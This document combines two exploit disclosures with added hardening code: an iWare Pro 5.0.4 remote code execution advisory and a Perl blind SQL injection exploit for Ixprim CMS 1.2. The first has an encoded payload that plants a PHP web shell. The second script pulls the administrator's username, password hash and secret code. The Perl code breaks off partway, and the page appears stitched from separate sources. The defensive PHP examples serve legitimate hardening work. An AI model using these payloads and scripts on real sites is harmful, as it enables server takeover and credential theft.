iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability

Affected Software .: iWare Professional CMS <= 5.0.4
Vendor :
Download :
Description : "iWare is an Open Source PHP & MySQL Content Management System"
Class : Remote Code Execution
Risk : High (Remote Code Execution)
Found By : nuffsaid <nuffsaid[at]newbslove.us>

Details:
iWare admin/mods/simplechat_1.0.0/chat_panel.php does not sanitize the $message variable
in the first argument of the PostMessage() function on line 11 before writing the variable
contents to chat_log.php on line 25. When chat_panel.php is requested, the PostMessage()
function is called on line 32 and $_REQUEST['msg'] is written to chat_log.php unsanitized.

Vulnerable Code:
admin/mods/simplechat_1.0.0/chat_panel.php, line(s) 11-32:
-> 11: function PostMessage($message) {
-> 16: $new_message = "".$message."<br />\n";
-> 23: $open_file = fopen("chat_log.php", "w");
-> 25: fputs($open_file, stripslashes($new_message));
-> 28: fclose($open_file);
-> 29: }
-> 32: if($_REQUEST['talk']==1){PostMessage($_REQUEST['msg']);}

Proof Of Concept:
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=[evilcode]
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php
-> http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=%3C%3Fphp%0D%0A%24open_file+%3D+fopen%28%22 %2F %2F %2Fevilfile.php%22%2C+%22w%22%29%3B%0D%0Afputs%28%24open_file%2C%22%3C%3Fphp+include%28%5C%24_GET%5B%27evil_include%27%5D%29%3B+%3F%3E%22%29%3B%0D%0Afclose%28%24open_file%29%3B%0D%0Achmod%28%22 %2F %2F %2Fevilfile.php%22%2C0777%29%3B%0D%0A%3F%3E
-> http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php
-> http://[target]/[path]/evilfile.php?evil_include=

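The root cause above is that user text is written verbatim into a file the PHP interpreter later executes. The hardened PostMessage() below is an added example, not iWare's own code: it escapes on write, stores the log as plain data outside the web root, and appends under a lock instead of rewriting the file. The constants CHAT_LOG_DIR, CHAT_LOG_FILE and CHAT_MAX_LEN and the RenderChatLog() helper are assumptions made for this example; the admin authentication around the module is unchanged and out of scope here.

```php
<?php
// Added example (not iWare's code): a hardened replacement for the
// PostMessage() shown in the advisory. Assumptions: the same trigger
// (talk=1, msg=...) and a writable directory that the web server does
// not serve, given here by the hypothetical constant CHAT_LOG_DIR.
define('CHAT_LOG_DIR', '/var/lib/iware/chat');           // assumption: outside the web root
define('CHAT_LOG_FILE', CHAT_LOG_DIR . '/chat_log.txt'); // data file, never a .php file
define('CHAT_MAX_LEN', 500);                             // bound on message length

function PostMessage($message)
{
    // Only accept a bounded, well-formed UTF-8 string; the original
    // accepted anything $_REQUEST carried.
    if (!is_string($message) || !mb_check_encoding($message, 'UTF-8')) {
        return false;
    }
    $message = trim(mb_substr($message, 0, CHAT_MAX_LEN, 'UTF-8'));
    if ($message === '') {
        return false;
    }

    // Escape on write so "<?php ... ?>" or "<script>" is stored as inert
    // text. No stripslashes(): that was a magic_quotes-era workaround.
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Append one line under an exclusive lock instead of reopening the
    // log in "w" mode, and keep it where PHP will never execute it.
    $written = file_put_contents(CHAT_LOG_FILE, $safe . "\n", FILE_APPEND | LOCK_EX);
    return $written !== false;
}

// Rendering reads the data file back and emits it as HTML. Because every
// line was escaped on write, the interpreter never parses user input.
function RenderChatLog()
{
    if (!is_readable(CHAT_LOG_FILE)) {
        return '';
    }
    $lines = file(CHAT_LOG_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    return implode("<br />\n", $lines) . "\n";
}

// Same trigger as the original line 32, but taken from $_POST only, so a
// plain link (GET via $_REQUEST) can no longer submit a message.
if (isset($_POST['talk'], $_POST['msg']) && $_POST['talk'] === '1') {
    PostMessage($_POST['msg']);
}
```

Two design points: escaping happens at the trust boundary (on write) so the stored file is safe regardless of how it is later included, and the file extension plus location remove the executable sink altogether, which is what turns the original file write into code execution.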
Black_hat_cr(HCE)
Ixprim CMS 1.2 Remote Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
#
# INFORMATIONS
# ============
# Affected.scr : Ixprim 1.2
# Poc.ID : 16061221
# Type : Blind SQL Injection
# Risk.level : Medium
# Conditions : load_file privilege (ixp code only)
# Src.download : www.ixprim-cms.org
# Poc.link : acid-root.new.fr/poc/16061221.txt
# Credits : DarkFig
#
#
# SCREENSHOT
# ==========
# header> Ixprim 1.2 Remote Blind SQL Injection Exploit
# header> =============================================
# status> Searching if someone posted a comment
# sploit> story_id=2
# status> Searching the administrator's uid
# sploit> 1
# status> Searching the administrator's username length
# sploit> 4
# status> Searching the administrator's username
# sploit> root
# status> Searching the adminitrator's password hash
# sploit> 7b24afc8bc80e548d66c4e7ff72171c5
# status> Searching a full path disclosure
# sploit> /home/www/ixprim-1.2/html/mainfile.php
# status> Searching the confidential ixp code
# sploit> c998aa6188034690aab6565c0099fe0a
#
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Response;
use Getopt::Long;
print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit";
print STDOUT "\n header> =============================================\n";
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);
if(!$host) {
print STDOUT " header> Usage : xpl.pl -host [host] -path [path]\n";
print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n";
exit(1);
}
$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";
my $ua = LWP::UserAgent->new();
$ua->agent('r00xzilla');
$ua->timeout(30);
$ua->proxy('[http]' => $proxh) if $proxh;
my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php');
$req->proxy_authorization_basic($proxu,$proxp) if $proxu;
$res = ($ua->request($req))->content;
print STDOUT " status> Searching if someone posted a comment\n";
# There is more than one sql injection, but this one is the most
# interesting to exploit. The parameter 'story_id' isn't properly
# sanitised before being used in an SQL query. URL Rewriting option
# supported.
#
if($res =~ /(story_id=||news-art)([0-9]+)(||.html)">([0-9]+) (commentaire||comment)/) {
$story_id = $2;
$bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id";
print STDOUT " sploit> story_id=$story_id\n";} else {
print STDOUT " status> No comment posted\n\n";
exit(1);
}
print STDOUT " status> Searching the administrator's uid\n";
$uid = sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20limit%200,1");
print STDOUT " status> Searching the administrator's username length\n";
$admlg = sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$uid))");
print STDOUT " status> Searching the administrator's username\n";
&sendreq(1,$admlg,"select%20uname%20from%20ixp_users%20where%20uid=$uid");
print STDOUT " status> Searching the adminitrator's password hash\n";
&sendreq(1,32,"select%20pass%20from%20ixp_users%20where%20uid=$uid");
print STDOUT " status> Searching a full path disclosure";
$req = GET $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php';
$res = ($ua->request($req))->content;
if($res =~ /in <b>(.*?)kernel(\/||\\)/) {
$fpd = $1.'mainfile.php';
print STDOUT "\n sploit> $fpd\n";} else {
print STDOUT "\n status> Can't get the full path disclosure";
exit(1);
}
# A personal code stored in mainfile.php protects the administration panel:
#
# // Code personnel CMS
# define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a');
#
# This code is generated by the function code() stored in install.fct.php:
#
# function code($param='1')
# {
# $number = rand(1,1024);
# $temp = md5(($number*time()).$param);
# $temp = substr($temp, 0, 8);
# return $temp;
# }
#
# $param = $host.$path, and $temp can be modified by the user.
# After the request is sent, the script creates the sql tables, and the time()
# at which it created them is stored in the mysql database; we can retrieve it with the sql
# injection and, IF the user didn't modify the generated code, we can find the
# personal code.
# The time during the creation of the table and the generation of the code
# is not the same, but we can try to bruteforce it with some parameters.
# But the user can change the generated code; that's why I decided to use the sql
# injection with load_file and regexp.
#
print STDOUT " status> Searching the confidential ixp code\n";
# Example with "C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php"
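The exploit above chains three weaknesses: an unvalidated story_id in the SQL query, an admin secret derived from rand() and a timestamp the database also records, and a MySQL account with the FILE privilege plus a PHP warning that leaks the install path. The block below is an added example, not Ixprim's code, showing the hardening side of each. It assumes a mysqli connection and a hypothetical table ixp_stories (the page names only ixp_users with uid, uname and pass); fetchStory() and the replacement code() are names chosen for this example.

```php
<?php
// Added example (not Ixprim's code): hardening for the weaknesses the
// exploit above depends on. Assumes a mysqli connection and a
// hypothetical table ixp_stories(story_id, title, body).

// (a) story_id is used unvalidated in a query. Accept only a plain
//     integer and bind it as a parameter, so the value is always data
//     and can never change the structure of the SQL (which is exactly
//     what a blind injection needs).
function fetchStory(mysqli $db, $rawStoryId)
{
    if (!preg_match('/^[1-9][0-9]{0,9}$/', (string)$rawStoryId)) {
        return null;                            // reject anything but digits
    }
    $storyId = (int)$rawStoryId;
    $stmt = $db->prepare('SELECT story_id, title, body FROM ixp_stories WHERE story_id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $storyId);
    $stmt->execute();
    $stmt->bind_result($id, $title, $body);
    $row = $stmt->fetch() ? ['story_id' => $id, 'title' => $title, 'body' => $body] : null;
    $stmt->close();
    return $row;
}

// (b) The original code() builds the secret from
//     md5((rand(1,1024)*time()).$param) cut to 8 hex chars, so its
//     entropy is bounded by rand() and a timestamp that is stored in the
//     database. A CSPRNG-backed secret of a sensible length removes the
//     guessing avenue entirely (random_bytes needs PHP >= 7.0).
function code()
{
    return bin2hex(random_bytes(16));           // 32 hex chars, 128 bits of entropy
}

// (c) Operational settings that close the remaining steps of the chain
//     (to be applied by the DBA / in php.ini, shown here as comments):
//     - load_file() requires MySQL's FILE privilege; give the web
//       application's account only table-level rights, e.g.
//       GRANT SELECT, INSERT, UPDATE, DELETE ON ixprim.* TO 'ixprim_app'@'localhost';
//     - the full path disclosure is a PHP warning echoed to the client;
//       run production with display_errors=Off and log_errors=On.
```

Of the three, the parameterised query is the one that removes the vulnerability class; the other two limit what an injection can reach, and a strong install-time secret means the admin code cannot be recovered even if a timestamp leaks.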